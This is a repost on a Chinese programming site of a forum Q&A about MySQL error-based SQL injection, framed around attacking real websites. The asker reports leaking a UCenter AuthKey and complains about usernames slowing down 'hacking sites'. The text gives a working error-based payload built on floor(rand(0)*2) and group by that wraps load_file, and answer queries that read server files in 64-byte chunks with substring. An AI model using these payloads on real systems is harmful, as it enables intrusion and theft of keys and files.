程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
設為首頁 加入收藏
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 數據庫知識 >> MYSQL數據庫 >> MYSQL入門知識 >> Mysql報錯注入的三個問題

Mysql報錯注入的三個問題

編輯:MYSQL入門知識
 

偶老早在T00ls提的仨問題

------------------------Question----------------------

No.1:Mysql報錯注入最多能夠顯示多少字節呢?我Inject到的UC的AuthKey爆出62位一共應該64位
No.2:爆出的用戶名中文和特殊符號顯示亂碼,用Hex()轉換了下爆出來再轉回去的時候依然亂碼,怎麼解決?你知道國內很多SB愛用各種怪異的符號做用戶名,嚴重影響日站的進度。。
No.3:能否用報錯注入Load_File(),我沒有成功語句如下:
and (select 1 from(select count(*),concat((select (select load_file(0x.........)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

--------------------------AnSwer-----------------------

1. 64 位,但是許多報錯注入都會在前後加上特別符號,以方便分辨,如[],就變成62位了,可以使用substring來處理
2. 如圖:


3. 同樣使用substring 以64為1單位慢慢讀, 最好就是寫個循環來讀
Select concat(substring(load_file(0x....),1,64)) FROM uc_applications limit 0,1
Select concat(substring(load_file(0x....),65,64)) FROM uc_applications limit 0,1
Select concat(substring(load_file(0x....),129,64)) FROM uc_applications limit 0,1

 
  1. 上一頁:
  2. 下一頁:
MYSQL入門知識
Windows下忘記mysql超級管理員root密碼的解決方法

 mysql服務器忘記了超級管理員ro
PDO和MySQLi連接區別

 自PHP5.5開始,傳統的mysql
MySQL Create Table創建表

表的創建命令需要: 表的名稱
mysql 數據庫引擎

一、數據庫引擎  數據庫引擎是用於存儲、處理和保護數據的核心
SQL的Where語句

 某DBA在查看自己的數庫日志的時候,
Mysql數據庫服務器安裝與配置詳解教程

 一、Mysql的安裝首先,看看自己電
相關文章
閱讀排行榜
MySQL集群建議 mysql中文亂碼的解決辦法 MySQL Where子句 MySQL下Limit使用及性能分析 MySQL Rand()函數 MySQL 唯一索引和插入重復自動更新 MySQL數據庫優化實踐教程 Hadoop源代碼分析 MySql忽略式插入,避免重復插入記錄 MySQL日期和時間函數 mysql如何安裝sphinx引擎
熱門圖文
SqlServer2008 數據庫同步的兩種方式(發布、訂閱使用方法) UseLOBStorage MySQL在太陽下茁壯 在開源中強大 SQL Server2000中的觸發器使用 Sql Server安裝出錯,安裝程序配置服務器失敗的解決方法小結 不可不知的Oracle查看鎖表進程 甲骨文推出 Oracle SOA套件11g mysql+php亂碼原理與解決
欄目導航
MYSQL入門知識SQL基礎知識關於MYSQL數據庫Mariadb數據庫MySQL綜合教程
Copyright © 程式師世界 All Rights Reserved